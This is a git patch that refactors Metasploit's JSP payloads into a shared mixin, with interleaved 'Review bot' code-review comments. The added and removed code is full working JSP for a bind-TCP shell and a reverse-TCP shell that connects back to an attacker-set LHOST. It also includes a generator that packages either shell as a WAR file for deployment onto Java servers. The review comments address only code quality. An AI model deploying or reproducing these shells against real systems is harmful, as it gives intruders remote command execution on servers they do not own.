From 0725b9c69caab3acc3ad87d5c64ba06b6610a908 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 31 Dec 2013 08:27:37 -0600
Subject: [PATCH] Refactor JSP payloads

---
 lib/msf/core/payload.rb | 1 +
 lib/msf/payload/jsp.rb | 154 ++++++++++++++++++
 .../singles/java/jsp_shell_bind_tcp.rb | 88 +---------
 .../singles/java/jsp_shell_reverse_tcp.rb | 87 +---------
 4 files changed, 159 insertions(+), 171 deletions(-)
 create mode 100644 lib/msf/payload/jsp.rb

diff --git a/lib/msf/core/payload.rb b/lib/msf/core/payload.rb
index f3e981db47..17dd28c5dc 100644
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -29,6 +29,7 @@ class Payload < Msf::Module
 require 'msf/core/payload/netware'
 require 'msf/core/payload/java'
 require 'msf/core/payload/dalvik'
+ require 'msf/payload/jsp'
 ##
 #
diff --git a/lib/msf/payload/jsp.rb b/lib/msf/payload/jsp.rb
new file mode 100644
index 0000000000..57fade18b8
--- /dev/null
+++ b/lib/msf/payload/jsp.rb
@@ -0,0 +1,154 @@
+# -*- coding: binary -*-
+require 'msf/core'
+require 'rex'
+
+module Msf::Payload::JSP
+ # Outputs jsp that spawns a bind TCP shell
+ # @return [String] jsp code that executes bind TCP payload
+ def jsp_bind_tcp
+ # Modified from: http://www.security.org.sg/code/jspreverse.html
+ jsp = <<-EOS
+ <%@page import="java.lang.*"%>
+ <%@page import="java.util.*"%>
+ <%@page import="java.io.*"%>
+ <%@page import="java.net.*"%>
+
+ <%
+ class StreamConnector extends Thread
+ {
+ InputStream is;
+ OutputStream os;
+
+ StreamConnector( InputStream is, OutputStream os )
+ {
+ this.is = is;
+ this.os = os;
+ }
+
+ public void run()
+ {
+ BufferedReader in = null;
+ BufferedWriter out = null;
+ try
+ {
+ in = new BufferedReader( new InputStreamReader( this.is ) );
+ out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+ char buffer[] = new char[8192];
+ int length;
+ while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+ {
+ out.write( buffer, 0, length );
+ out.flush();
+ }
+ } catch( Exception e ){}
+ try
+ {
+ if( in != null )
+ in.close();
+ if( out != null )
+ out.close();
+ } catch( Exception e ){}
+ }
+ }
+
+ try
+ {
+ ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
+ Socket client_socket = server_socket.accept();
+ server_socket.close();
+ Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+ ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
+ ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
+ } catch( Exception e ) {}
+ %>
+ EOS
+
+ return jsp.gsub(/^\s{6}/, '')
+ end
+
+ # Outputs jsp code that spawns a reverse TCP shell
+ # @return [String] jsp code that executes reverse TCP payload
+ def jsp_reverse_tcp
+ # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
+ jsp = <<-EOS
+ <%@page import="java.lang.*"%>
+ <%@page import="java.util.*"%>
+ <%@page import="java.io.*"%>
+ <%@page import="java.net.*"%>
+
+ <%
+ class StreamConnector extends Thread
+ {
+ InputStream is;
+ OutputStream os;
+
+ StreamConnector( InputStream is, OutputStream os )
+ {
+ this.is = is;
+ this.os = os;
+ }
+
+ public void run()
+ {
+ BufferedReader in = null;
+ BufferedWriter out = null;
+ try
+ {
+ in = new BufferedReader( new InputStreamReader( this.is ) );
+ out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+ char buffer[] = new char[8192];
+ int length;
+ while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+ {
+ out.write( buffer, 0, length );
+ out.flush();
+ }
+ } catch( Exception e ){}
+ try
+ {
+ if( in != null )
+ in.close();
+ if( out != null )
+ out.close();
+ } catch( Exception e ){}
+ }
+ }
+
+ try
+ {
+ Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
+ Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+ ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+ ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+ } catch( Exception e ) {}
+ %>
+ EOS
+ return jsp.gsub(/^\s{6}/, '')
+ end
+
+ # Wraps the jsp payload into a war
+ # @return [Rex::Zip::Jar] a war to execute the jsp payload
+ def generate_war
+ jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
+
+ zip = Rex::Zip::Jar.new
+
+ web_xml = <<-EOF
+
+
+
+ #{jsp_name}
+
+ EOF
+
+ zip.add_file("WEB-INF/", '')
+ zip.add_file("WEB-INF/web.xml", web_xml)
+ zip.add_file(jsp_name, generate)
+
+ zip
+ end
+end
diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
index 3959e86377..a82e42814a 100644
--- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb
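Review bot: In jsp_bind_tcp and jsp_reverse_tcp, `datastore['SHELL']` is interpolated verbatim into the Java string literal in `Runtime.getRuntime().exec( "#{datastore['SHELL']}" )`, so a value containing a double quote or backslash yields JSP that does not compile; the old `gsub( "SHELL", ... )` had the same gap, but the refactor is the place to close it, e.g. `shell = datastore['SHELL'].to_s.gsub(/["\\]/) { |c| "\\#{c}" }` and interpolating `shell` (LHOST in the reverse variant deserves the same treatment). The two methods also duplicate the StreamConnector class line for line; a private helper returning that class body, interpolated into both heredocs, would keep the template in one place. `generate_war` calls `generate`, which this mixin does not define, so a comment such as `# the including payload must define #generate` would make the contract explicit. Finally, the new file lands at lib/msf/payload/jsp.rb while its require is added beside the `msf/core/payload/*` siblings; placing it under lib/msf/core/payload/ would match them.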
@@ -12,6 +12,7 @@ require 'rex'
 module Metasploit3
 include Msf::Payload::Single
+ include Msf::Payload::JSP
 include Msf::Sessions::CommandShellOptions
 def initialize(info = {})
@@ -35,92 +36,7 @@ module Metasploit3
 def generate
- # Modified from: http://www.security.org.sg/code/jspreverse.html
- jsp = %q{
- <%@page import="java.lang.*"%>
- <%@page import="java.util.*"%>
- <%@page import="java.io.*"%>
- <%@page import="java.net.*"%>
-
- <%
- class StreamConnector extends Thread
- {
- InputStream is;
- OutputStream os;
-
- StreamConnector( InputStream is, OutputStream os )
- {
- this.is = is;
- this.os = os;
- }
-
- public void run()
- {
- BufferedReader in = null;
- BufferedWriter out = null;
- try
- {
- in = new BufferedReader( new InputStreamReader( this.is ) );
- out = new BufferedWriter( new OutputStreamWriter( this.os ) );
- char buffer[] = new char[8192];
- int length;
- while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
- {
- out.write( buffer, 0, length );
- out.flush();
- }
- } catch( Exception e ){}
- try
- {
- if( in != null )
- in.close();
- if( out != null )
- out.close();
- } catch( Exception e ){}
- }
- }
-
- try
- {
- ServerSocket server_socket = new ServerSocket( LPORT );
- Socket client_socket = server_socket.accept();
- server_socket.close();
- Process process = Runtime.getRuntime().exec( "SHELL" );
- ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
- ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
- } catch( Exception e ) {}
- %>
- }
-
- jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
-
- jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
-
- return super + jsp
- end
-
- def generate_war
- jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
-
- zip = Rex::Zip::Jar.new
-
- web_xml = <<-EOF
-
-
-
- #{jsp_name}
-
- EOF
-
- zip.add_file("WEB-INF/", '')
- zip.add_file("WEB-INF/web.xml", web_xml)
- zip.add_file(jsp_name, generate)
-
- zip
+ return super + jsp_bind_tcp
 end
 end
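Review bot: `return super + jsp_bind_tcp` keeps a trailing `return` that is redundant in Ruby's last-expression position; `super + jsp_bind_tcp` reads cleaner, and the same applies to `return super + jsp_reverse_tcp` in the reverse module's hunk. Unlike the reverse module, which still returns bare `super` when LHOST is unset, this `generate` has no guard on LPORT, and the mixin interpolates it as `new ServerSocket( #{datastore['LPORT'].to_s} )`, so if LPORT were ever empty the emitted JSP would contain `new ServerSocket(  )` and fail to compile; a guard mirroring the reverse module's, `return super if datastore['LPORT'].to_s.empty?`, would keep the two payloads consistent. LPORT likely carries a default in practice, so this is a consistency point more than a live failure.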
diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
index 47c02d0c14..aa7bce4b28 100644
--- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
@@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 include Msf::Payload::Single
+ include Msf::Payload::JSP
 include Msf::Sessions::CommandShellOptions
 def initialize(info = {})
@@ -34,96 +35,12 @@ module Metasploit3
 def generate
- # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
- jsp = %q{
- <%@page import="java.lang.*"%>
- <%@page import="java.util.*"%>
- <%@page import="java.io.*"%>
- <%@page import="java.net.*"%>
-
- <%
- class StreamConnector extends Thread
- {
- InputStream is;
- OutputStream os;
-
- StreamConnector( InputStream is, OutputStream os )
- {
- this.is = is;
- this.os = os;
- }
-
- public void run()
- {
- BufferedReader in = null;
- BufferedWriter out = null;
- try
- {
- in = new BufferedReader( new InputStreamReader( this.is ) );
- out = new BufferedWriter( new OutputStreamWriter( this.os ) );
- char buffer[] = new char[8192];
- int length;
- while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
- {
- out.write( buffer, 0, length );
- out.flush();
- }
- } catch( Exception e ){}
- try
- {
- if( in != null )
- in.close();
- if( out != null )
- out.close();
- } catch( Exception e ){}
- }
- }
-
- try
- {
- Socket socket = new Socket( "LHOST", LPORT );
- Process process = Runtime.getRuntime().exec( "SHELL" );
- ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
- ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
- } catch( Exception e ) {}
- %>
- }
 if( !datastore['LHOST'] or datastore['LHOST'].empty? )
 return super
 end
- jsp = jsp.gsub( "LHOST", datastore['LHOST'] )
-
- jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
-
- jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
-
- return super + jsp
- end
-
- def generate_war
- jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
-
- zip = Rex::Zip::Jar.new
-
- web_xml = <<-EOF
-
-
-
- #{jsp_name}
-
- EOF
-
- zip.add_file("WEB-INF/", '')
- zip.add_file("WEB-INF/web.xml", web_xml)
- zip.add_file(jsp_name, generate)
-
- zip
+ return super + jsp_reverse_tcp
 end
 end